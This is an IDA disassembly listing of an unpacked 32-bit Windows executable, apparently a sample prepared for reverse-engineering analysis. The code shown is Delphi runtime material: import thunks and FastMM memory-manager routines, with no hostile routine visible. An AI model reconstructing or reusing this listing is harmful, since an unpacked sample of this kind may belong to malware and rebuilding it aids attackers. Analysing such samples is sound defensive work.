;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 80AEEA81B0DC32311F1109E2C7DF96CC
; File Name : u:\work\80aeea81b0dc32311f1109e2c7df96cc_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 40000000
; Section 1. (virtual address 00001000)
; Virtual size : 000173EC ( 95212.)
; Section size in file : 000173EC ( 95212.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 40001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_40001000 dd offset dword_40001004 ; DATA XREF: .text:40006E36�o
; .text:400077E5�o ...
dword_40001004 dd 7473060Ah, 676E6972hoff_4000100C dd offset dword_40001010 ; DATA XREF: .text:40006AD6�o
; .text:40006ADE�o ...
dword_40001010 dd 69570A0Bh, 74536564h, 676E6972hoff_4000101C dd offset dword_40001068 ; DATA XREF: .text:40001108�o
; .text:40006E08�o ...
dd 7 dup(0)
dd offset dword_40001068
dd 4, 0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40001068 dd 624F5407h, 7463656Ah ; .text:4000103C�o ...
off_40001070 dd offset dword_40001074 ; DATA XREF: .text:4000D6D0�o
; .text:40013185�o
dword_40001074 dd 4F540707h, 63656A62h db 74h
dd offset dword_40001068
align 4
dword_40001084 dd 6000000h, 74737953h, 6D65h, 244483CCh, 0D9E9F804h, 83000051h
; DATA XREF: .text:off_400010B1�o
dd 0F8042444h, 51F7E9h, 24448300h, 1E9F804h, 0CC000052h
db 0CCh
off_400010B1 dd offset dword_40001084+0Dh ; DATA XREF: .text:400010D1�o
dd offset dword_40001084+17h
dd offset dword_40001084+21h
byte_400010BD db 1, 2 dup(0) ; DATA XREF: .text:400010E4�o
dd 2 dup(0)
dd 0C000h, 0
db 46h
dd offset off_400010B1
db 8, 2 dup(0)
align 10h
off_400010E0 dd offset dword_4000112C ; DATA XREF: .text:40007930�o
dd offset byte_400010BD
dd 6 dup(0)
dd offset dword_4000112C
dd 0Ch
dd offset off_4000101C
dd offset sub_40003EF4
dd offset sub_40006248
dd offset sub_40006254
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40006264
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000112C dd 6E495411h, 66726574h, 64656361h, 656A624Fh, 0C08B7463h
; DATA XREF: .text:off_400010E0�o
; .text:40001100�o
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001140 proc near ; CODE XREF: sub_4000314C+4�p
; .text:40003308�p
jmp ds:dword_400244AC
sub_40001140 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001148 proc near ; CODE XREF: .text:40003204�p
; sub_40003644+9B�p
jmp ds:dword_400244A8
sub_40001148 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001150 proc near ; CODE XREF: .text:400032ED�p
jmp ds:dword_400244A4
sub_40001150 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001158 proc near ; CODE XREF: .text:40003228�p
jmp ds:dword_400244A0
sub_40001158 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001160 proc near ; CODE XREF: .text:loc_400032D7�p
; sub_40003644:loc_400036FF�p ...
jmp ds:dword_4002449C
sub_40001160 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001168 proc near ; CODE XREF: sub_40003FE8+14�p
; sub_40004004+16�p ...
jmp ds:dword_40024498
sub_40001168 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001170 proc near ; CODE XREF: sub_400030D0+1E�p
; .text:40003265�p
jmp ds:dword_40024494
sub_40001170 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001178 proc near ; CODE XREF: sub_400040D8+D2�p
; .text:40004470�p
; DATA XREF: ...
jmp ds:dword_40024490
sub_40001178 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001180 proc near ; CODE XREF: .text:4000329C�p
jmp ds:dword_4002448C
sub_40001180 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001188 proc near ; CODE XREF: .text:40003244�p
; .text:4000328E�p
jmp ds:dword_40024488
sub_40001188 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001190 proc near ; CODE XREF: sub_400040D8+6A�p
; sub_400040D8+A7�p ...
jmp ds:dword_40024484
sub_40001190 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001198 proc near ; CODE XREF: sub_40003110+1F�p
; sub_40004704+3F�p ...
jmp ds:dword_40024480
sub_40001198 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011A0 proc near ; CODE XREF: sub_40002EFC+C�p
; sub_40002EFC+3A�p ...
jmp ds:dword_4002440C
sub_400011A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011A8 proc near ; CODE XREF: sub_40004790+C0�p
jmp ds:dword_4002447C
sub_400011A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011B0 proc near ; CODE XREF: sub_40002540+39E�p
; sub_40004704+78�p
jmp ds:dword_40024408
sub_400011B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011B8 proc near ; CODE XREF: sub_40005C60+123�p
jmp ds:dword_40024478
sub_400011B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011C0 proc near ; CODE XREF: sub_40005C60+111�p
jmp ds:dword_40024474
sub_400011C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011C8 proc near ; CODE XREF: sub_40004790+88�p
jmp ds:dword_40024470
sub_400011C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011D0 proc near ; CODE XREF: sub_40002FF8:loc_4000302E�p
; .itext:4001906C�p
jmp ds:dword_4002446C
sub_400011D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011D8 proc near ; CODE XREF: sub_40002D8C�p
; sub_400030D0+27�p ...
jmp ds:dword_40024468
sub_400011D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011E0 proc near ; CODE XREF: sub_40005E24+12F�p
jmp ds:dword_40024464
sub_400011E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011E8 proc near ; CODE XREF: sub_40002FF8+24�p
; sub_40005BC0+1E�p ...
jmp ds:dword_40024460
sub_400011E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011F0 proc near ; CODE XREF: sub_40005C60+1D�p
jmp ds:dword_4002445C
sub_400011F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400011F8 proc near ; CODE XREF: sub_40005C60+34�p
jmp ds:dword_40024458
sub_400011F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001200 proc near ; CODE XREF: sub_400012A0+A�p
jmp ds:dword_40024454
sub_40001200 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001208 proc near ; CODE XREF: sub_40005E24+129�p
jmp ds:dword_40024450
sub_40001208 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001210 proc near ; CODE XREF: sub_40005E24+1B1�p
; sub_40005E24+1E9�p ...
jmp ds:dword_4002444C
sub_40001210 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001218 proc near ; CODE XREF: sub_400062F0+32�p
jmp ds:dword_40024404
sub_40001218 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001220 proc near ; CODE XREF: sub_40005C60+64�p
; sub_40005C60+C8�p ...
jmp ds:dword_40024448
sub_40001220 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001228 proc near ; CODE XREF: sub_40005C60+12F�p
; sub_40005C60+16F�p ...
jmp ds:dword_40024444
sub_40001228 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001230 proc near ; CODE XREF: sub_400049C4+12�p
jmp ds:dword_40024440
sub_40001230 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001238 proc near ; CODE XREF: sub_40003B94+6B�p
; sub_40005E24+FF�p
jmp ds:dword_400243F4
sub_40001238 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001240 proc near ; CODE XREF: sub_40003B94+22�p
; sub_40005E24+3A�p ...
jmp ds:dword_400243F0
sub_40001240 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001248 proc near ; CODE XREF: sub_40003B94+55�p
; sub_40005E24+BF�p ...
jmp ds:dword_400243EC
sub_40001248 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001250 proc near ; CODE XREF: sub_400049A4+16�p
jmp ds:dword_4002443C
sub_40001250 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001258 proc near ; CODE XREF: sub_40002208+39�p
; sub_40005B98+B�p
jmp ds:dword_40024438
sub_40001258 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001260 proc near ; CODE XREF: sub_40004FE0+7�p
; sub_400050F8+B�p
jmp ds:dword_400243E4
sub_40001260 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001268 proc near ; CODE XREF: sub_40005044+1A�p
jmp ds:dword_400243E0
sub_40001268 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001270 proc near ; CODE XREF: sub_40004FF8+7�p
; sub_40005008+E�p ...
jmp ds:dword_400243DC
sub_40001270 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001278 proc near ; CODE XREF: .text:400062A6�p
jmp ds:dword_40024434
sub_40001278 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001280 proc near ; CODE XREF: sub_40006248+4�p
; .text:400062BC�p
jmp ds:dword_40024430
sub_40001280 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001288 proc near ; CODE XREF: .itext:4001908A�p
jmp ds:dword_4002442C
sub_40001288 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001290 proc near ; CODE XREF: sub_40003058+4�p
jmp ds:dword_40024428
sub_40001290 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40001298 proc near ; CODE XREF: sub_40003058:loc_40003070�p
jmp ds:dword_40024424
sub_40001298 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400012A0 proc near ; CODE XREF: .itext:40019076�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_40001200 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_400012BB
movzx ebx, [esp+48h+var_18]
loc_400012BB: ; CODE XREF: sub_400012A0+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_400012A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400012C4 proc near ; CODE XREF: sub_400015DC+16�p
; sub_40001694+20�p ...
jmp ds:dword_40024420
sub_400012C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400012CC proc near ; CODE XREF: sub_400016F8+1C�p
; sub_40001A9C+190�p ...
jmp ds:dword_4002441C
sub_400012CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400012D4 proc near ; CODE XREF: sub_40001654+D�p
; sub_40001654+26�p ...
jmp ds:dword_40024418
sub_400012D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400012DC proc near ; CODE XREF: sub_40002BB4+F�p
jmp ds:dword_40024400
sub_400012DC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 57h
aFastmmBorlandE db 'FastMM Borland Edition © 2004, 2005 Pierre le Riche / Professiona'
; DATA XREF: .data:off_4001A040�o
db 'l Software Development',0
; =============== S U B R O U T I N E =======================================
sub_40001344 proc near ; CODE XREF: sub_40001654+1B�p
; sub_40001654+34�p ...
lock cmpxchg [ecx], dl
retn
sub_40001344 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000134C proc near ; DATA XREF: .data:off_4001A060�o
mov ecx, [eax]
mov [edx], ecx
mov ecx, [eax+4]
mov eax, [eax+8]
mov [edx+4], ecx
mov [edx+8], eax
retn
sub_4000134C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40001360 proc near ; DATA XREF: .data:4001A080�o
mov ecx, [eax]
mov [edx], ecx
mov ecx, [eax+4]
mov [edx+4], ecx
mov ecx, [eax+8]
mov [edx+8], ecx
mov ecx, [eax+0Ch]
mov eax, [eax+10h]
mov [edx+0Ch], ecx
mov [edx+10h], eax
retn
sub_40001360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40001380 proc near ; DATA XREF: .data:4001A0A0�o
mov ecx, [eax]
mov [edx], ecx
mov ecx, [eax+4]
mov [edx+4], ecx
mov ecx, [eax+8]
mov [edx+8], ecx
mov ecx, [eax+0Ch]
mov [edx+0Ch], ecx
mov ecx, [eax+10h]
mov [edx+10h], ecx
mov ecx, [eax+14h]
mov eax, [eax+18h]
mov [edx+14h], ecx
mov [edx+18h], eax
retn
sub_40001380 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400013AC proc near ; DATA XREF: .data:4001A0C0�o
fild qword ptr [eax]
fild qword ptr [eax+8]
fild qword ptr [eax+10h]
fild qword ptr [eax+18h]
mov ecx, [eax+20h]
mov [edx+20h], ecx
fistp qword ptr [edx+18h]
fistp qword ptr [edx+10h]
fistp qword ptr [edx+8]
fistp qword ptr [edx]
retn
sub_400013AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400013CC proc near ; DATA XREF: .data:4001A0E0�o
fild qword ptr [eax]
fild qword ptr [eax+8]
fild qword ptr [eax+10h]
fild qword ptr [eax+18h]
fild qword ptr [eax+20h]
mov ecx, [eax+28h]
mov [edx+28h], ecx
fistp qword ptr [edx+20h]
fistp qword ptr [edx+18h]
fistp qword ptr [edx+10h]
fistp qword ptr [edx+8]
fistp qword ptr [edx]
retn
sub_400013CC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400013F0 proc near ; DATA XREF: .data:4001A100�o
fild qword ptr [eax]
fild qword ptr [eax+8]
fild qword ptr [eax+10h]
fild qword ptr [eax+18h]
fild qword ptr [eax+20h]
fild qword ptr [eax+28h]
mov ecx, [eax+30h]
mov [edx+30h], ecx
fistp qword ptr [edx+28h]
fistp qword ptr [edx+20h]
fistp qword ptr [edx+18h]
fistp qword ptr [edx+10h]
fistp qword ptr [edx+8]
fistp qword ptr [edx]
retn
sub_400013F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000141C proc near ; DATA XREF: .data:4001A120�o
fild qword ptr [eax]
fild qword ptr [eax+8]
fild qword ptr [eax+10h]
fild qword ptr [eax+18h]
fild qword ptr [eax+20h]
fild qword ptr [eax+28h]
fild qword ptr [eax+30h]
mov ecx, [eax+38h]
mov [edx+38h], ecx
fistp qword ptr [edx+30h]
fistp qword ptr [edx+28h]
fistp qword ptr [edx+20h]
fistp qword ptr [edx+18h]
fistp qword ptr [edx+10h]
fistp qword ptr [edx+8]
fistp qword ptr [edx]
retn
sub_4000141C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000144C proc near ; DATA XREF: .data:4001A140�o
fild qword ptr [eax]
fild qword ptr [eax+8]
fild qword ptr [eax+10h]
fild qword ptr [eax+18h]
fild qword ptr [eax+20h]
fild qword ptr [eax+28h]
fild qword ptr [eax+30h]
fild qword ptr [eax+38h]
mov ecx, [eax+40h]
mov [edx+40h], ecx
fistp qword ptr [edx+38h]
fistp qword ptr [edx+30h]
fistp qword ptr [edx+28h]
fistp qword ptr [edx+20h]
fistp qword ptr [edx+18h]
fistp qword ptr [edx+10h]
fistp qword ptr [edx+8]
fistp qword ptr [edx]
retn
sub_4000144C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40001484 proc near ; CODE XREF: sub_40001C7C+2D8�p
; sub_40001C7C+32F�p
; DATA XREF: ...
sub ecx, 0Ch
add eax, ecx
add edx, ecx
neg ecx
jns short loc_400014A2
loc_4000148F: ; CODE XREF: sub_40001484+1C�j
fild qword ptr [ecx+eax]
fild qword ptr [ecx+eax+8]
fistp qword ptr [ecx+edx+8]
fistp qword ptr [ecx+edx]
add ecx, 10h
js short loc_4000148F
loc_400014A2: ; CODE XREF: sub_40001484+9�j
fild qword ptr [ecx+eax]
fistp qword ptr [ecx+edx]
mov eax, [ecx+eax+8]
mov [ecx+edx+8], eax
retn
sub_40001484 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400014B4 proc near ; CODE XREF: sub_40001C7C+41�p
; sub_40001C7C+1A5�p ...
sub ecx, 4
add eax, ecx
add edx, ecx
neg ecx
loc_400014BD: ; CODE XREF: sub_400014B4+12�j
fild qword ptr [ecx+eax]
fistp qword ptr [ecx+edx]
add ecx, 8
js short loc_400014BD
mov eax, [ecx+eax]
mov [ecx+edx], eax
retn
sub_400014B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400014D0 proc near ; CODE XREF: sub_40001570+4C�p
; sub_40001A9C+148�p ...
mov ecx, [eax+4]
mov edx, [eax]
cmp ecx, edx
mov [ecx], edx
mov [edx+4], ecx
jz short loc_400014E0
locret_400014DE: ; CODE XREF: sub_400014D0+2C�j
retn
; ---------------------------------------------------------------------------
align 10h
loc_400014E0: ; CODE XREF: sub_400014D0+C�j
sub ecx, offset off_4001C7A8
mov edx, ecx
shr ecx, 3
movzx edx, dh
mov eax, 0FFFFFFFEh
rol eax, cl
and ds:dword_4001C728[edx*4], eax
jnz short locret_400014DE
mov eax, 0FFFFFFFEh
mov ecx, edx
rol eax, cl
and ds:dword_4001C724, eax
retn
sub_400014D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40001510 proc near ; CODE XREF: sub_40001570+33�j
; sub_40001734+17D�p ...
sub edx, 0B30h
shr edx, 8
sub edx, 3FFh
sbb ecx, ecx
and edx, ecx
add edx, 3FFh
lea ecx, off_4001C7A8[edx*8]
mov edx, [ecx+4]
cmp edx, ecx
mov [eax], ecx
mov [eax+4], edx
mov [edx], eax
mov [ecx+4], eax
jz short loc_40001544
retn
; ---------------------------------------------------------------------------
align 4
loc_40001544: ; CODE XREF: sub_40001510+2F�j
sub ecx, offset off_4001C7A8
mov edx, ecx
shr ecx, 3
movzx edx, dh
mov eax, 1
shl eax, cl
or ds:dword_4001C728[edx*4], eax
mov eax, 1
mov ecx, edx
shl eax, cl
or ds:dword_4001C724, eax
retn
sub_40001510 endp
; =============== S U B R O U T I N E =======================================
sub_40001570 proc near ; CODE XREF: sub_400015DC+3�p
; sub_40001A9C+1A6�p
cmp ds:dword_4001C720, 0
jnz short loc_4000157C
retn
; ---------------------------------------------------------------------------
align 4
loc_4000157C: ; CODE XREF: sub_40001570+7�j
mov eax, ds:dword_4001C71C
test byte ptr [eax-4], 1
jnz short loc_400015AC
or dword ptr [eax-4], 8
mov edx, ds:dword_4001C720
sub eax, edx
loc_40001593: ; CODE XREF: sub_40001570+68�j
lea ecx, [edx+3]
mov [eax-4], ecx
mov [edx+eax-8], edx
cmp edx, 0B30h
jnb sub_40001510
retn
; ---------------------------------------------------------------------------
align 4
loc_400015AC: ; CODE XREF: sub_40001570+15�j
mov edx, 0FFFFFFF0h
and edx, [eax-4]
cmp edx, 0B30h
jb short loc_400015CE
call sub_400014D0
mov eax, ds:dword_4001C71C
mov edx, 0FFFFFFF0h
and edx, [eax-4]
loc_400015CE: ; CODE XREF: sub_40001570+4A�j
mov ecx, ds:dword_4001C720
sub eax, ecx
add edx, ecx
jmp short loc_40001593
sub_40001570 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400015DC proc near ; CODE XREF: sub_40001734+1BE�p
; sub_40001734+2DA�p
push ebx
mov ebx, eax
call sub_40001570
push 4
push 1000h
push 140000h
push 0
call sub_400012C4 ; VirtualAlloc
test eax, eax
jz short loc_40001648
mov edx, ds:dword_4001C70C
mov ecx, eax
mov dword ptr [ecx], offset dword_4001C708
mov ds:dword_4001C70C, eax
mov [ecx+4], edx
mov [edx], eax
mov edx, eax
add edx, 140000h
mov ecx, edx
sub ecx, 4
mov dword ptr [ecx], 2
mov ecx, 13FFF0h
sub ecx, ebx
mov ds:dword_4001C720, ecx
sub edx, ebx
mov eax, edx
mov ds:dword_4001C71C, eax
or ebx, 2
mov edx, eax
sub edx, 4
mov [edx], ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001648: ; CODE XREF: sub_400015DC+1D�j
xor eax, eax
mov ds:dword_4001C720, eax
xor eax, eax
pop ebx
retn
sub_400015DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40001654 proc near ; CODE XREF: sub_40001694+36�p
; sub_400016F8+8�p
cmp ds:byte_4001C04D, 0
jz short locret_40001691
jmp short loc_4000167F
; ---------------------------------------------------------------------------
loc_4000165F: ; CODE XREF: sub_40001654+3B�j
push 0
call sub_400012D4 ; Sleep
mov ecx, offset byte_4001E7A8
mov dl, 1
xor eax, eax
call sub_40001344
test al, al
jz short locret_40001691
push 0Ah
call sub_400012D4 ; Sleep
loc_4000167F: ; CODE XREF: sub_40001654+9�j
mov ecx, offset byte_4001E7A8
mov dl, 1
xor eax, eax
call sub_40001344
test al, al
jnz short loc_4000165F
locret_40001691: ; CODE XREF: sub_40001654+7�j
; sub_40001654+22�j
retn
sub_40001654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40001694 proc near ; CODE XREF: sub_40001734+35F�j
push ebx
push esi
push edi
push ebp
mov ebp, eax
lea esi, [ebp+10010h]
dec esi
add esi, 4
and esi, 0FFFF0000h
push 4
push 101000h
push esi
push 0
call sub_400012C4 ; VirtualAlloc
mov ebx, eax
test ebx, ebx
jz short loc_400016EF
mov edi, ebx
mov [edi+8], ebp
or esi, 4
mov [edi+0Ch], esi
call sub_40001654
mov eax, ds:dword_4001E7B0
mov dword ptr [edi], offset dword_4001E7AC
mov ds:dword_4001E7B0, ebx
mov [edi+4], eax
mov [eax], ebx
mov ds:byte_4001E7A8, 0
add ebx, 10h
loc_400016EF: ; CODE XREF: sub_40001694+29�j
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40001694 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400016F8 proc near ; CODE XREF: sub_40001A9C+1D4�j
push ebx
push esi
push edi
mov ebx, eax
sub ebx, 10h
call sub_40001654
mov eax, ebx
mov esi, [eax]
mov edi, [eax+4]
push 8000h
push 0
push ebx
call sub_400012CC ; VirtualFree
test eax, eax
jz short loc_40001726
mov [edi], esi
mov [esi+4], edi
xor eax, eax
jmp short loc_40001729
; ---------------------------------------------------------------------------
loc_40001726: ; CODE XREF: sub_400016F8+23�j
or eax, 0FFFFFFFFh
loc_40001729: ; CODE XREF: sub_400016F8+2C�j
mov ds:byte_4001E7A8, 0
pop edi
pop esi
pop ebx
retn
sub_400016F8 endp
; =============== S U B R O U T I N E =======================================
sub_40001734 proc near ; CODE XREF: sub_40001C7C+30�p
; sub_40001C7C+66�p ...
lea edx, [eax+3]
shr edx, 3
cmp eax, 0A2Ch
push ebx
mov cl, ds:byte_4001C04D
ja loc_40001978
test cl, cl
movzx eax, ds:byte_4001C5C0[edx]
lea ebx, byte_4001A044[eax*8]
jnz short loc_400017B4
loc_4000175E: ; CODE XREF: sub_40001734+89�j
; sub_40001734+97�j ...
mov edx, [ebx+4]
mov eax, [edx+8]
mov ecx, 0FFFFFFF8h
cmp edx, ebx
jz short loc_40001784
add dword ptr [edx+0Ch], 1
and ecx, [eax-4]
mov [edx+8], ecx
mov [eax-4], edx
jz short loc_400017A4
mov byte ptr [ebx], 0
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001784: ; CODE XREF: sub_40001734+37�j
mov edx, [ebx+10h]
movzx ecx, word ptr [ebx+2]
add ecx, eax
cmp eax, [ebx+0Ch]
ja short loc_40001800
add dword ptr [edx+0Ch], 1
mov [ebx+8], ecx
mov byte ptr [ebx], 0
mov [eax-4], edx
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_400017A4: ; CODE XREF: sub_40001734+46�j
mov ecx, [edx+4]
mov [ecx+14h], ebx
mov [ebx+4], ecx
mov byte ptr [ebx], 0
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_400017B4: ; CODE XREF: sub_40001734+28�j
; sub_40001734+C7�j
mov eax, 100h
lock cmpxchg [ebx], ah
jz short loc_4000175E
add ebx, 20h
mov eax, 100h
lock cmpxchg [ebx], ah
jz short loc_4000175E
add ebx, 20h
mov eax, 100h
lock cmpxchg [ebx], ah
jz short loc_4000175E
sub ebx, 40h
push 0
call sub_400012D4 ; Sleep
mov eax, 100h
lock cmpxchg [ebx], ah
jz loc_4000175E
push 0Ah
call sub_400012D4 ; Sleep
jmp short loc_400017B4
; ---------------------------------------------------------------------------
align 10h
loc_40001800: ; CODE XREF: sub_40001734+5C�j
push esi
push edi
cmp ds:byte_4001C04D, 0
jz short loc_4000183C
loc_4000180B: ; CODE XREF: sub_40001734+103�j
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_4000183C
push 0
call sub_400012D4 ; Sleep
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_4000183C
push 0Ah
call sub_400012D4 ; Sleep
jmp short loc_4000180B
; ---------------------------------------------------------------------------
align 4
loc_4000183C: ; CODE XREF: sub_40001734+D5�j
; sub_40001734+E4�j ...
movsx esi, byte ptr [ebx+1]
and esi, ds:dword_4001C724
jz short loc_400018B8
bsf eax, esi
lea esi, ds:0[eax*8]
mov ecx, ds:dword_4001C728[eax*4]
bsf ecx, ecx
lea ecx, [ecx+esi*4]
lea edi, off_4001C7A8[ecx*8]
mov esi, [edi+4]
mov edx, [esi+4]
mov [edi+4], edx
mov [edx], edi
cmp edi, edx
jnz short loc_4000188C
mov edx, 0FFFFFFFEh
rol edx, cl
and ds:dword_4001C728[eax*4], edx
jnz short loc_4000188C
btr ds:dword_4001C724, eax
loc_4000188C: ; CODE XREF: sub_40001734+13F�j
; sub_40001734+14F�j
mov edi, 0FFFFFFF0h
and edi, [esi-4]
cmp edi, 10A60h
jb short loc_40001908
mov edx, edi
movzx edi, word ptr [ebx+1Ah]
sub edx, edi
lea eax, [edi+esi]
